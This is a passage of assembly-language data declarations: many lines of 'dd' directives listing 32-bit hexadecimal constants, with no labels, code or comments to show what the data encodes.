dd 167F7C41h, 5F4902DCh, 2179C2DCh, 45B64328h, 10C731D0h
dd 0E7F9CC6Fh, 0EDBB623Fh, 0A5479744h, 3FE31D4Dh, 357D4DCDh
dd 0F271D002h, 9EBDB2CBh, 0C627B4D8h, 3BA77C98h, 0DE59ECB0h
dd 952BECD9h, 1D0A3CD4h, 5FEB3859h, 0CDAFD644h, 0F7DE3748h
dd 7DB5A680h, 3B6A600Dh, 564E6ADCh, 0FC7660F3h, 0AB41BDF5h
dd 5DF39E92h, 5E688E8h, 0B94BDE8Ch, 8265C57h, 637A8695h
dd 66C5C3EEh, 0D8360D2h, 2E5152F7h, 31ABF2C2h, 8CDC142Ah
dd 0A869CA4h, 0ED1DE34Bh, 0DBF394D8h, 78834E36h, 0E0D86231h
dd 90C8833Bh, 0AF94A5A3h, 7EBB42C7h, 0CE7CD8CEh, 10205A46h
dd 715FFE0h, 7AA85635h, 872B833Ch, 60B10C6Eh, 32D32C58h
dd 170D86DAh, 85F7CC16h, 3B894B95h, 6EEC186Ch, 0E06377FDh
dd 0C55D3FA2h, 4148E2B0h, 38FD883Ah, 0E1EFCD9Ch, 6101ADF4h
dd 8ADE54FAh, 0F1F6F0Dh, 0DC43B573h, 16B6EFC4h, 54F70B02h
dd 308C5B84h, 0F14B52F6h, 1AB7B622h, 0B12814A0h, 56BF3EC1h
dd 0EF114165h, 28386946h, 1E64EC9Dh, 0BA6770BDh, 0A714A83Ch
dd 9F3F732Fh, 779E1318h, 0A4F3057h, 0D0B4C834h, 15F1A5F4h
dd 2DE16D78h, 11FA99Dh, 9DD0D1E0h, 0A7A8B1F8h, 1916EE50h
dd 68B8D38Eh, 0D50F0660h, 32CA22C9h, 0EF3686F6h, 1828227Bh
dd 0D3FFAC8Fh, 0B0EC58F7h, 5FA3540Dh, 0CC9E7896h, 22EFA113h
dd 0A334FF0h, 4513DBF4h, 89106300h, 0E932EF9Bh, 14F0588Ah
dd 25509C0Fh, 80B759CFh, 60ADEA72h, 0EBECA4A7h, 8A0FF8C0h
dd 8DAEB63Dh, 0B30C8A0Dh, 0F0D4994Ah, 0E2F2D1ACh, 0BD9B1551h
dd 0B1B346ABh, 91058A5Bh, 0E48365DFh, 0CD32119Ah, 6BF03626h
dd 1804A911h, 28FFDC40h, 77EB7Fh, 141BD2DDh, 2D5513BCh
dd 22647CFh, 2C40DE7Dh, 4118ED40h, 14D8F7B7h, 0B32D293Ch
dd 8A431BCAh, 6EBD7484h, 0FFE83529h, 88D35086h, 0B31D7401h
dd 45D5EF4Dh, 0E24D2A55h, 0DF406515h, 0A015FDD2h, 26BF4C8Ch
dd 373EEA16h, 519F73BEh, 7CAE5AABh, 0B48ECC5Dh, 82D28ECDh
dd 68ECCF0Bh, 6A1BCE1Ch, 0B1BF37C7h, 9F865847h, 3CA22A5Ah
dd 2C224819h, 6E1A8FFDh, 3101E4BEh, 0A7B6EECEh, 0F2B87C8Fh
dd 9743FEFEh, 79AA6E8Ch, 3383B8ACh, 91B3409Bh, 0EF9D8BF6h
dd 2FF05E10h, 0A61BB1F5h, 3E93A483h, 0AA057528h, 66510535h
dd 0FC91DC17h, 885D0756h, 0F9A92244h, 246BA35Eh, 7DDFC408h
dd 28C14C7Fh, 21B571F5h, 76F77B5Eh, 1702F046h, 765050C4h
dd 8CBCCA71h, 0EEFBD881h, 8D1A81CDh, 0A5127809h, 0B9FF8AD5h
dd 0B2E77BBEh, 266D0E47h, 0A9018133h, 39DA6F85h, 0A2C1A4B5h
dd 2ADD8B96h, 22790B62h, 86B833C9h, 0D64EFBFEh, 0F8611DC0h
dd 0A8F6B254h, 0EAA1F9Ch, 0CBB7E50Ah, 0B52928F8h, 2B49B9B2h
dd 5B0FAE2Ah, 30DEEED2h, 0E550ABD9h, 39E870DBh, 40323C64h
dd 8C14884Ah, 7C71F2A9h, 59D42616h, 0A9485B5Eh, 52FBD04Ah
dd 549232h, 0F4BE114Dh, 0BF467CA8h, 1B0527C8h, 47C4449h
dd 6D7D706Dh, 0B7FBB218h, 0D2A7E532h, 0DDD555AAh, 0D3F952A6h
dd 4732D920h, 0D9EE97EDh, 0BFE0E507h, 21215A55h, 0DFFADDCFh
dd 56C1E70Eh, 45BB51B6h, 0C723DB20h, 0C11314DDh, 0C9AE8EECh
dd 6E8E9636h, 0E62B7E5Ah, 502221E7h, 7D05E179h, 5D4418DEh
dd 87C7FD8Fh, 5163F0AEh, 0CACD7875h, 0F70E51BEh, 274653Eh
dd 2DCBC8F7h, 825D6B78h, 146143DFh, 0D8EA2163h, 0F3CC6395h
dd 40274DB8h, 0C6CCA2B0h, 3E42C204h, 0D4321654h, 9DBC6361h
dd 0CE6C46A3h, 0B7119C65h, 39172BE9h, 0C3D41750h, 8FAAA75Eh
dd 0AB2EE593h, 6896E833h, 29DF0283h, 49C48C97h, 5B2C3D59h
dd 3405D078h, 43CBCDEDh, 8CD1F42Bh, 6AF9E45Dh, 0E3CB4E55h
dd 0EEDD818h, 2C59A785h, 0DF72C2C5h, 327D6FECh, 751AA3C7h
dd 0A1F0E8A8h, 71FDD03Eh, 90FC6D36h, 184DB870h, 0ED447D50h
dd 0EFA6B9B8h, 9B42294Ah, 2398AC97h, 30EF96AEh, 4223E1A2h
dd 1431FCC2h, 1B57FD16h, 2F1798BFh, 44275DC8h, 6A5D4E26h
dd 0EF709C94h, 0B7CCDBCCh, 3D9EC37Fh, 0EB87FF88h, 3E62E1DFh
dd 8ADDA1B4h, 0A53BFA8Eh, 0DCCBC4D9h, 1B20D269h, 0AB679ABCh
dd 0E741DB3Eh, 8516836h, 805BB4EFh, 0A342CBE1h, 745E776Bh
dd 615EC2C5h, 0E63A7201h, 0E0C700AFh, 9D0A7E04h, 0BDFCAD03h
dd 100E926Dh, 0F4B4EA4Dh, 0D5FF272Eh, 21929EE8h, 3B62B40Dh
dd 0CF0C3650h, 9AF6A840h, 0B3F26A74h, 3ACC7BD0h, 0F5B9508Bh
dd 0DC3ACEB5h, 94DA5B3Ch, 3057445h, 0C1FF4946h, 6E217709h
dd 11619B07h, 0E9540C81h, 0D51D47AEh, 32C682C3h, 71E5495Ah
dd 0D5FAA736h, 0A67B93C5h, 0B1DB8345h, 7B6E75EBh, 14B7454Ah
dd 92445EC7h, 0B27664BEh, 88844436h, 7D77AF1Eh, 0E05EAF3Bh
dd 0B2776Bh, 2EA81225h, 197425E5h, 0BB27F10Dh, 274F8CE9h
dd 948EB559h, 29E69962h, 653878ABh, 0B384C59Bh, 4A07F07Eh
dd 0F86DAA8Eh, 0D9B67DE3h, 30386327h, 0AA0E7476h, 7F0BC42Fh
dd 0F737AA6Eh, 69BCFB07h, 2DDBEB68h, 3E253323h, 0C649D08Ah
dd 6D27626Dh, 6B172977h, 60BD132h, 0F9606451h, 0E51F9D38h
dd 85A24F6Eh, 0BF7F5E99h, 0B69E6DECh, 0EC377670h, 0B9B0C9CDh
dd 29CAD58h, 27CACD77h, 0D07B15DAh, 97A56DCAh, 1344A931h
dd 0C53BB033h, 5A58706Bh, 8FCA7CBFh, 26BE5948h, 56060916h
dd 9718F6E6h, 0A3BD64CBh, 0CF5005h, 2DAE4FD9h, 0E76F0E2Ch
dd 84826973h, 0CD305D33h, 3C1F3916h, 9918E78Dh, 7C32BBE8h
dd 3F6B9547h, 4C7297C4h
dd 53E02851h, 9F572667h, 168EFDFAh, 0BD725AAh, 98656D2Bh
dd 8EFAB7BAh, 6F050B6Fh, 0BC74E449h, 0E536FB49h, 0B4FE90BEh
dd 185F7BDDh, 0B54671A3h, 0EB9F98AAh, 0D5F54C94h, 0D305B77Bh
dd 2615583Bh, 0CCD780C7h, 51733A24h, 549E55E2h, 344DCDCEh
dd 30CCBFBh, 0A3DE1D6Ah, 2A4E6640h, 257B6BE3h, 1E813BA8h
dd 766DCAE8h, 242757ECh, 8A790E2Fh, 0E6B01754h, 39B0EA56h
dd 0A7CDCBCh, 0C8EB988Fh, 0AED2790Ch, 6C56F838h, 7746C89Eh
dd 3EC1CC4h, 7B88B57Fh, 366E1731h, 606C5CDEh, 3DC251D1h
dd 0CACCCCA1h, 616B5D2h, 0DB8BA114h, 0D9E1900Dh, 0AE11A59h
dd 0F9E249C6h, 6C4B565Ah, 0E2470E9Ah, 2FC834E4h, 0F27D5118h
dd 0D3B8C050h, 76575C9Dh, 673A8D31h, 0ADB1DE7Ah, 0D98C6FD1h
dd 0E6C53C1Dh, 435B3DB2h, 333FDDFCh, 2AB185DBh, 510B2FF8h
dd 21AF670Dh, 0E3534D93h, 0BA3F01BDh, 7D2B2C3Ch, 88825B38h
dd 44FB3E27h, 7B5A2CBEh, 69090FB7h, 0A8A2D40Dh, 24DB898Ah
dd 995788B2h, 89336084h, 430D3F1Eh, 9E0C1AB1h, 624AC53Dh
dd 2BF281F4h, 0C5095E74h, 7E763F1Bh, 80A908BAh, 1F02EF8Ah
dd 3C82B69Eh, 0B5E230EFh, 3A3FD62Ch, 0F8936EE7h, 604EAC5Bh
dd 2D87A01Fh, 0E0E9420Bh, 0D5F7B459h, 0FF119711h, 0D0B905B7h
dd 6EF89DA3h, 69771200h, 0DEE6B308h, 0E087471Ah, 0E63D4292h
dd 0EFC271DAh, 0A841C253h, 4F9BFh, 87E5299Bh, 158FB2C1h
dd 745189BBh, 0E9C53A3Eh, 31901B3Eh, 6B15A6F6h, 8E208362h
dd 0E060B119h, 0BE291A70h, 0B40CD0F8h, 873F021Fh, 621EFC66h
dd 58129E81h, 80E5D4E1h, 142A5500h, 6745BDBEh, 6A832E4Bh
dd 0C0B3E0CAh, 12369CDBh, 0FA8B1D74h, 6D1CF6E9h, 0A7D64333h
dd 0A0A33595h, 9FD014A8h, 0AB9E1CFCh, 2CF1FCE4h, 0BB4186E5h
dd 0DAE94FEAh, 3FFD1A3Bh, 0D9F33996h, 0C9665A8Fh, 0AAE3BC9Bh
dd 333C84h, 0E779DBFBh, 4004980h, 4A819D7Ch, 28468765h
dd 71879591h, 7777CE56h, 6EAD280Bh, 7BA83468h, 672516C7h
dd 4AB09B9Bh, 0D1D7D68Eh, 90BCF669h, 0C63A1579h, 3A6C1BBBh
dd 0E31B7BEBh, 5EF641BAh, 7AC5B7EEh, 0EBCD34A1h, 3578AEC5h
dd 0EA58BC9Fh, 0DA566556h, 0ADAA6691h, 9A68553Ch, 18E0636h
dd 996BF33Eh, 836A38F6h, 68DE5303h, 0B637F381h, 483046DFh
dd 1780F943h, 20686C56h, 0D1160CD0h, 53CAF2C3h, 0DC4F82E8h
dd 2B04EABEh, 8FB8E011h, 32D24BA2h, 0D1A660BAh, 8AD4D9BCh
dd 0B8F9BD19h, 9150FAE7h, 5A38F8A0h, 2970315Bh, 0F6D34423h
dd 6507C03Ah, 0E36FEC74h, 748726FDh, 0AE2BEB32h, 0BEC50AB3h
dd 4EB2F2EBh, 14473542h, 0FCBC9516h, 92923F22h, 0BA699531h
dd 0F2DBB082h, 61CA1C52h, 0DA9EAF12h, 0DF6336D8h, 6B43223Eh
dd 0B05C38ABh, 0BD584097h, 5D53E5A1h, 0E41619E6h, 732EC1C9h
dd 55F6D44Fh, 5C624A26h, 801BD4D1h, 0D95880BFh, 3BD96AB7h
dd 3AEBAF4Ch, 79E61C57h, 0B27A1D01h, 23E5CECAh, 1B6E22D1h
dd 6EF2102Eh, 373BFD58h, 33FB2B37h, 5B4C15CEh, 9B1B9EA5h
dd 16D90E28h, 0DD6F1B16h, 5F4026E0h, 3CA3146Dh, 889AB29Ch
dd 0B3FF7384h, 25B2F67Dh, 0B48F540Ah, 0DD461B7Dh, 709D00A7h
dd 5AF25264h, 0D8043ED3h, 3A177BDBh, 26E77038h, 764F3363h
dd 1EB100B0h, 200052A6h, 455928FEh, 4C88434Dh, 40B8790Eh
dd 925028EDh, 53BC8601h, 0BC84FDFBh, 0EBF48C7Fh, 0F02D6E8Ah
dd 0F34530ADh, 0A30DB955h, 0CC6B2AE1h, 32ED4147h, 0E92879D3h
dd 85AA079h, 0A5F59DC6h, 932273B6h, 43C7E1D6h, 0B7800281h
dd 864F6794h, 0BA27BBE6h, 0A39FE36Dh, 82DBA4B6h, 5189AA26h
dd 2EB5587Bh, 0FC3284A2h, 0F2BB902h, 484F5435h, 0E1A18B55h
dd 91F8E3B5h, 0EEE1B139h, 6CEA0D64h, 0E5800C2Ch, 0EB68F285h
dd 0FBE0312Dh, 5B996070h, 7524F589h, 58BA47A5h, 0B0DCBABDh
dd 9E684601h, 63139699h, 0D878470h, 8FD76C33h, 85827ABBh
dd 5BE5ABE2h, 364A8580h, 0D08D94AAh, 35C056FFh, 7C261CAAh
dd 638CDAA2h, 58C82D13h, 63A62E6Ah, 62026EB3h, 2B20E157h
dd 97650837h, 0B9AE165h, 44C395F1h, 379537D8h, 56A3D69h
dd 99D82ECFh, 8AE79E6h, 0BCEC5C0Eh, 13987B3Bh, 0A77DF757h
dd 86BE1100h, 4417EC37h, 698D18Dh, 7429A8C4h, 5283F378h
dd 0D976A18Ah, 676297Dh, 0D46693B2h, 8AF41523h, 0A3B08D34h
dd 5F17663Ch, 21FA0C44h, 3582D013h, 0B1031B75h, 330FB9C5h
dd 0D0A6DC51h, 46639082h, 76FCBDBEh, 6BD3FEFCh, 3ACDC7C1h
dd 86ADF871h, 980EE3D6h, 114204F7h, 0D5735420h, 0F6FF99ACh
dd 0CDFE59DEh, 0DC4CA8BAh, 0C30079h, 69D7FA2h, 33C81074h
dd 53571F51h, 0B027865h, 0EFFB07ECh, 433D015Ch, 0F6BBC709h
dd 37BCA47Bh, 9E9BDF2Dh, 0D7B62706h, 364086CEh, 5AAE0017h
dd 4429C022h, 0E36198B8h, 9CF7F59h, 8C5F90E8h, 0D79E66EEh
dd 435A1EA9h, 0C5509C95h, 0B06BDD16h, 0E6EFE975h, 7F41096Dh
dd 0C0C780EFh, 6BF613F6h, 17CB499Eh, 9B7C85E7h, 9B78F3FCh
dd 74B48A94h, 7E620725h, 1165517Ch, 22350D9Ah, 2EC0AC8Ch
dd 0F975A061h, 883ACC43h, 0C35E333Fh, 0C2CB4351h, 0E26C5FF9h
dd 0ECE92330h, 33DE97Bh, 8BE00F7Dh, 1F5F338Ch, 1997F1F7h
dd 0A1E242E4h, 8EBBC366h, 0E858F2FEh, 9737D449h, 0D4D45916h
dd 0F0CA14EDh, 0DD170CF3h, 0D3722920h, 9445061Ah, 73C72D8Bh
dd 83D5ED2Ah, 291F3396h, 0AFF9B5BFh, 8881624Dh, 31A27816h
dd 3220BE00h, 5B15C17Ah, 0B7BFD6A9h, 0EDE51451h, 81E02600h
dd 6EE70F39h, 5FA7D214h, 2394AB2Dh, 27C69585h, 16598C62h
dd 0B2DAEDB1h, 32203AC9h, 28A447B1h, 71F5D1FDh, 0DCB0CF35h
dd 1767E55Bh, 1783C77Dh, 9A52277Dh, 0AFF91E0Bh, 4B06265h
dd 4A71E85Eh, 19E9D8FDh, 0FF8C6C82h, 9368B143h, 19B1AF3Eh
dd 1C38EC93h, 13506AB2h, 147C4C84h, 44A79512h, 0D337AB85h
dd 1D29C355h, 1C09ECBh, 0ACE0CE41h, 0FDB9668Ch, 0BED3BCAAh
dd 76C025DBh, 0CE35E48Bh, 56ED8104h, 2CDDDE2Ah, 75D25DBDh
dd 0E1D2DA75h, 2092FFCCh, 0FC134F3Fh, 0BAF98A7Bh, 3F17FF5Dh
dd 0BAC04754h, 9C174368h, 0A81E951Dh, 0FB3AB85Bh, 938F0DD1h
dd 0B4125007h, 0E5AE4A2Ah, 0D1D6ABD6h, 97F4351Ch, 0F1B0A3F4h
dd 0FBD6BFF1h, 229CC92Fh, 4D46C713h, 2C7BE9EEh, 26A6F8A2h
dd 0C9532D35h, 0F9EAF5C4h, 15919797h, 84BF3353h, 1F6A8C26h
dd 0A1571EC8h, 7D4FC04Ch, 0C96A159Ch, 0E976B0AAh, 0F403F09h
dd 0EA946EADh, 573E980h, 0D8968515h, 0F799E34Bh, 2A57B30Fh
dd 0CC403784h, 0F13747CEh, 0D163FF97h, 717EF13Ah, 14B983D5h
dd 9584BAB6h, 591F6DF5h, 82DBDCD3h, 5450FF4Eh, 4D53A609h
dd 0CC7F4B2Bh, 76C6EAFDh, 0CA0B71C2h, 0AEE27BD8h, 0D6573359h
dd 0F2A9875Bh, 6F04AE80h, 0E00B77B8h, 21B8DF61h, 23F85440h
dd 725F2509h, 2EDB9426h, 0E07C3FE3h, 30C8F827h, 0C56DDE4Dh
dd 12D4F4C3h, 0F5EA2C98h, 69B84C2h, 9161D30Dh, 0EAC463B4h
dd 1782291Bh, 5BFE5FC8h, 0C0247CFFh, 0B2DBB990h, 39260821h
dd 4A9238B1h, 0CD5CCA35h, 87B12588h, 608297A6h, 3118C76h
dd 0D9E7ACC1h, 0AD838416h, 37F0A8A6h, 3FE0B9C6h, 9018D04h
dd 267D25D3h, 0BFB4BB08h, 82B2161Fh, 492CD663h, 1F698ABBh
dd 0E1E2EDAFh, 7D45E9F1h, 0A8392A2Bh, 0CC962846h, 20B86485h
dd 19A73BCCh, 58483AF6h, 44738846h, 6ADB4E1Bh, 3CA8B2F8h
dd 9E8FC1C3h, 5A8BDA2Eh
dd 7266AEEAh, 77C87A7Dh, 0D5D77A6Eh, 0CEDEE493h, 8FA6D0F2h
dd 14A3F14h, 1915A02Ah, 17FD7F60h, 0C7F1B1B8h, 49F132C7h
dd 3C68B8EDh, 9D0EEE3Ah, 498FDB38h, 54927786h, 8E8AD414h
dd 126D28D5h, 10464EE8h, 0C4AB7D00h, 1E5EA40Eh, 24447AFEh
dd 6BA92C1Bh, 76C10297h, 49DE12EFh, 0D969A13Fh, 58FC8442h
dd 0BB0B724Ah, 2BA4EF1Dh, 8321F8A4h, 0D6925395h, 499F375h
dd 0F63991A3h, 2B4D5558h, 93E9B1B1h, 0EFE4EBDAh, 0C251BA12h
dd 4F72F6EDh, 0C489977Ch, 5CE0E7E9h, 5FE0DB11h, 35E4901Bh
dd 99D1626Dh, 81663E1h, 1729E28Ch, 2FC2BB68h, 4710E00Dh
dd 0A4EB9ACBh, 0E0F6D36Ch, 0F05FFB18h, 0DA652007h, 0AC05A481h
dd 0B4968D7Dh, 7DAD18DBh, 70A56BBBh, 3DB4E225h, 3C05390Ah
dd 0E6C9E795h, 0F303EFF6h, 43121CACh, 0BBC8226Bh, 30E2B1F1h
dd 54F5F298h, 0EA0A7588h, 0A0E32DC7h, 21D51A7Dh, 64CA63A7h
dd 31BFF9B3h, 5564DF34h, 0E0B8FDB8h, 2FC8F754h, 5ABB0F3Ch
dd 0F4A59117h, 0E7AC6BFDh, 0F5288AA7h, 0F86904B5h, 37601EEh
dd 0E6C2C6F3h, 8B2428D0h, 0F39EC555h, 0DEC3C6EFh, 16066ECDh
dd 8A406068h, 0DAB71BCEh, 36E240F8h, 59A061B8h, 88B6A2FEh
dd 0C3320BB1h, 56470D6Dh, 0CA20BF8Ah, 3C7CFE77h, 7CB9CD98h
dd 627AFA73h, 48445923h, 5483A720h, 0F8B0D873h, 6932428Ch
dd 133D2150h, 760DBC6Eh, 7C390942h, 0C287932Dh, 0E1C45A80h
dd 2AFED345h, 550841F9h, 0EDDFFF26h, 1477EA2Ah, 3C5520CEh
dd 0A908B7AAh, 309B1106h, 894CA0C7h, 0B9BFAD94h, 2DE1F887h
dd 0E43C5BE6h, 93130108h, 0F3D461C2h, 6F64813Bh, 0EBAE7F15h
dd 0CE239D1Ah, 335435E2h, 43BB3908h, 8F70FBD7h, 98738CF6h
dd 0DCA01EBEh, 0CD829D85h, 79E2BA51h, 5944B33Ch, 3575416Fh
dd 13B7D0C7h, 7AF181C4h, 5ED0A05Fh, 50CE0389h, 0D18E2F93h
dd 5A0A9879h, 8FB2528Dh, 78B80EACh, 4A4AAC1Ah, 897E07Ah
dd 60DCBFA1h, 7FE45941h, 9F926756h, 0C6888101h, 570C0830h
dd 0D581460Dh, 0AFC0837h, 7E343587h, 9C94B477h, 0E1C4BE99h
dd 1F4DA4F9h, 28819B32h, 4EB3EF45h, 7BBCD473h, 8841B959h
dd 4AB894C0h, 0AC03D8FBh, 0C5E1F193h, 0AAD73520h, 8DCDD4E4h
dd 47467955h, 36D16BE4h, 9C9846CBh, 9723C8B9h, 9DF6606Ah
dd 33E8A28Fh, 0FCA28D37h, 537AB530h, 2B54FBB7h, 0E53311ABh
dd 0DAEF930h, 28252060h, 9B85631Ah, 33AFC1E3h, 0BE754FD8h
dd 88D84923h, 7EA638B0h, 0AC24393Ch, 3751A6EDh, 82C5CE23h
dd 59A56971h, 9BBDDAA3h, 0BDF67AFEh, 79A5754Bh, 7E482AC6h
dd 0B767B073h, 52524B32h, 8C59C82h, 24B8AC2h, 8AC51CAFh
dd 75CA8F9h, 0D03E64FDh, 6BE2E87Fh, 0C337B6ACh, 57694BA5h
dd 0B75FF201h, 6E05C79Bh, 789FFDFh, 55C6BA92h, 0FD70EE2Dh
dd 990E0ABDh, 2E925EB4h, 0A3DDF00Ch, 0CDB068B6h, 69CC44AFh
dd 13C5D6Bh, 0FC25021Dh, 0C1DA37CCh, 9AC17696h, 0E18E45DFh
dd 483CDD85h, 0EC0D4466h, 3646FD8h, 8258B173h, 0A0E1DE9Ah
dd 0AAF92019h, 84EFDCDEh, 0D358309Ah, 0A335C3EEh, 10F9176Eh
dd 15ED48EDh, 43638904h, 6EE6DB70h, 21E325C4h, 85527A5Ch
dd 2EEDE966h, 5AA131Ch, 94DCDB1Eh, 0C2D6F92Fh, 19036B9Eh
dd 0E83654D4h, 0BEF1D843h, 12DCF225h, 0CF993BD4h, 0AC0F7D32h
dd 38D9BE5h, 9B4D6433h, 76600FB7h, 9ED3D80Bh, 0DD2ADB15h
dd 39D4EE4Eh, 33456DFh, 0C5C2BEF9h, 780FB399h, 5DFC8DCFh
dd 0F022495Dh, 5A291B92h, 90A81AB3h, 0FB3B1110h, 0A55E18EEh
dd 0E9731915h, 0AB8AF10Bh, 4DA6415Dh, 0C9284CEAh, 0DD7CFE3Dh
dd 0CA444192h, 720BA925h, 9C54CC9Ch, 0C2155D7Fh, 0AC88C070h
dd 0A029C29Eh, 22D12D78h, 0E48DF6Ch, 6F5DD497h, 98F6A7FAh
dd 0DE715DE6h, 0D817930Ah, 8B41A0BDh, 0D2D897AEh, 198562F3h
dd 6B913543h, 0C10716B9h, 523B9551h, 4C6C061h, 3944FC7Ah
dd 0D53876FFh, 0FFA91E7Ch, 0F2AF509Eh, 71D010F5h, 0B99AB00Dh
dd 92DCC357h, 0A02B7B74h, 248A610Ah, 0E30231CCh, 6CDF0A02h
dd 0ECBE3F5Ch, 0B7507868h, 94925CCCh, 875738A6h, 0C82A6815h
dd 0C17F0B46h, 4635EAFFh, 3187229h, 2AFC6685h, 389FBCADh
dd 0D6A8CADBh, 84FFDABh, 0CFF6A63Eh, 0B36F6AA6h, 72F8E010h
dd 0A264E2F5h, 4BD9982h, 0E897DF5h, 331CF6A1h, 52096335h
dd 2AAC96ABh, 41E326E6h, 0F66EEC3Eh, 8499FA01h, 66FB18A8h
dd 8DB440BFh, 0B2E13760h, 9F09D415h, 9A491641h, 48F745B2h
dd 0BAF34292h, 9F29486Ah, 5785EE0h, 9B10692Ch, 0EF1E9DE1h
dd 75A89F9Bh, 728B11C5h, 82842F9h, 509F3AFFh, 6BEB468Ah
dd 0EF5B990Dh, 4A817B1Ah, 1716FF05h, 0FD7428Bh, 44132CE0h
dd 856159DEh, 211F08Dh, 0B6AF153Bh, 0FE68C128h, 0C4609BE2h
dd 3BF2CB95h, 0A168378Ah, 5B134201h, 0F1D56CC7h, 5C8CFB22h
dd 0A86C1FDAh, 0A9382428h, 0CE74681Ah, 4799F9DEh, 5D0EF254h
dd 0ED1C05C0h, 29C96810h, 11F64EB2h, 299DFECEh, 15FA0F42h
dd 98C57DFCh, 81FE548Fh, 483122C9h, 0CDC76524h, 8425F835h
dd 97D7C653h, 0FDA40DFBh, 69F60931h, 26D183FCh, 8371BAE5h
dd 32EE6671h, 7300A0Eh, 725A66BBh, 4FB1A8B1h, 749EEEACh
dd 21CE80Ch, 7A8D2D2Ch, 0A4722B53h, 70A87E85h, 55280713h
dd 0E239E3D8h, 0AC6C6E72h, 0FAF0960Ah, 0D116F9FFh, 2E972842h
dd 83A7BC49h, 4CA48249h, 24DE1C7Dh, 0A8510951h, 0C17B2312h
dd 0AD44A2EAh, 0CCFA4E26h, 0FD69B946h, 855A937Ch, 0D88627E6h
dd 0E94F46A5h, 4092A78Ah, 3BA75790h, 677B6957h, 2D7D956Fh
dd 0F2BC0FBDh, 0B88CED4Eh, 0E46AC215h, 0DD77A397h, 0BBF8F459h
dd 42CB9560h, 0F6CAA591h, 0D6B8AF51h, 0BDF405B0h, 9C9EEE85h
dd 777F642Bh, 7A43BA45h, 3003F74Dh, 3D6FC095h, 1B3500F5h
dd 0A97A4274h, 0D66F6789h, 9CE0ABD3h, 0F348A9FDh, 0B355C3B6h
dd 290B804Ch, 3046170Ch, 0A95062FCh, 7F378C98h, 0DFC9115Ch
dd 794D2B98h, 1DD58D37h, 2C1CA8DCh, 95BE0851h, 0EF88CEF0h
dd 0E13BD9F2h, 0F96E8B9Ch, 303296ABh, 80E25623h, 0C6389B19h
dd 0D879EDD6h, 0B04B662Bh, 0F213188Bh, 5F16E49Ah, 0B63328B1h
dd 1F9E18A6h, 0EBFC2095h, 0A9F45EB4h, 6DB54264h, 7978857Eh
dd 65E594AFh, 44B30107h, 0AE2B76BBh, 0BFFE0502h, 7172B264h
dd 0F3B7FB1Ah, 13C3FFE9h, 7666E2D4h, 8DAEF311h, 9B618BF6h
dd 2CDD7357h, 0F31C2663h, 0A1016A49h, 666EB145h, 0D4B9C096h
dd 3FB1B624h, 944265DBh, 7F8EBF82h, 2C2D6ABBh, 0A1CA7142h
dd 0F94863AEh, 0C9185701h, 5515CB51h, 0BD5BFFA5h, 0D7549921h
dd 0F74707A4h, 0BE6C00A3h, 0FD9EA440h, 4DC9B7EEh, 63CD127Bh
dd 11D917B7h, 0BCE60D8Ah, 0E08BA2C0h, 0AE02F1C5h, 0C998774Ch
dd 3962376Ch, 0DABEFBAEh, 8DA2DDD8h, 6CDC52D4h, 0C74ED828h
dd 0D7CB68ADh, 6C2D6440h, 251C1CC5h, 0C36CE027h, 5D2DE45Ah
dd 3C00590h, 2C4A9D51h, 0F13A223Eh, 0C3C8550Ch, 94785EA4h
dd 0E261EA30h, 0F727DC6Ch, 0F8D54595h, 7FAFD251h, 594B8CD5h
dd 38ABC26Eh, 947BE0B8h, 0E639180h, 47318CFAh, 39FEB51Fh
dd 0A3AA00AFh, 2B3A0E11h, 4788DF24h, 521646C2h, 0D77528B4h
dd 0DC14508Bh, 0C835EF99h, 7F31D802h, 253CD2F4h, 1C1132F7h
dd 88B03FABh, 28804B2Ah, 6A5011E6h, 46894049h, 8DEA2257h
dd 0ACF322Eh, 0B9D0F417h, 3D383859h, 63E766EFh, 78CDFF5Fh
dd 0AA02D0BAh, 521F7359h
dd 7107D145h, 1A95B473h, 0C2EBB6CDh, 0CE93584Ah, 0A63D6230h
dd 1654419Eh, 5DCDFF6Fh, 98A4B151h, 5DF30D4Dh, 7A5F797Fh
dd 0C918EA0Eh, 1B0B548h, 0DC93E57Bh, 446AE053h, 8FFEE59Dh
dd 3449E93Bh, 61BAFFD2h, 80E92A61h, 0D98BFE0Dh, 0CD3E3BB5h
dd 20EF8EB6h, 611C86A1h, 34E3C443h, 9E51CA73h, 45B40D2Fh
dd 9F86DF17h, 0B7BA340Eh, 6A19883Eh, 0B1DB7A2Ah, 908A3F7Ah
dd 5806A617h, 3F090493h, 20BBD0BBh, 31853A9Ah, 66F3BD9Fh
dd 9ED209CCh, 0C43C23E2h, 9F156E59h, 38217D94h, 69240D9Fh
dd 6129AB96h, 0E42E5D79h, 0D2F23FCEh, 0F91A9B7Bh, 0E22CC783h
dd 9F211319h, 6167EEE4h, 0C02A5486h, 0D3100A2Eh, 0EAECEC10h
dd 569B9414h, 0B3E106E7h, 4B7E5A0Eh, 331BDB7Dh, 5611EF04h
dd 0E721D352h, 8FC2094Dh, 55740BB0h, 2D4F4D2Ch, 6243C105h
dd 1A6E10AAh, 0F5FB655Ah, 3249C168h, 0BBDFDB86h, 25011F23h
dd 0A9D44D21h, 0B15EF231h, 0A7D99A48h, 1F3CE8F4h, 0C183A6EFh
dd 0CA81F9DDh, 7003BA44h, 54951161h, 73B5E347h, 0DE015CD9h
dd 6D27641Eh, 37E3601Eh, 947E848Fh, 1DA6CECCh, 4A03F21Dh
dd 9A1DC424h, 0A2B91D73h, 392544Ch, 0DE4D0590h, 0EAD3DAF0h
dd 52A1F71Bh, 0EDF0F5FBh, 514674E1h, 6EF77B41h, 6A561188h
dd 5044E93Bh, 0E6E58B23h, 0D324020h, 0F0DAF7E4h, 0B86A7CEh
dd 3C8858E4h, 8B0509EAh, 0DF86ACBh, 37E70D4Dh, 0FBC643E6h
dd 2FCC73AEh, 784F3151h, 578FFC7Ch, 0C2F345A2h, 8D1A7DDCh
dd 1D0C4EF1h, 79F96E54h, 848AFA6Ch, 0B409C483h, 1BC2D22Eh
dd 0BD4CAD35h, 0B65921AAh, 0B040FA3Ch, 2F665E6Dh, 373501D2h
dd 0C5B77CE7h, 1B84E25Bh, 4C6DFFBBh, 62D02A49h, 0CE676400h
dd 6B1DC200h, 9D1006C7h, 4736C5A2h, 0FB4E1B22h, 924A30BDh
dd 0E573C0A6h, 0F825B901h, 4B72E5D8h, 0ADE0D283h, 1629CF25h
dd 0B437BAA9h, 754A3C9Fh, 0A7FFBEC8h, 0BF7ACE8Ah, 64B507F8h
dd 8FDDE14Eh, 0F84B0757h, 69332B4Bh, 94246CF4h, 62285411h
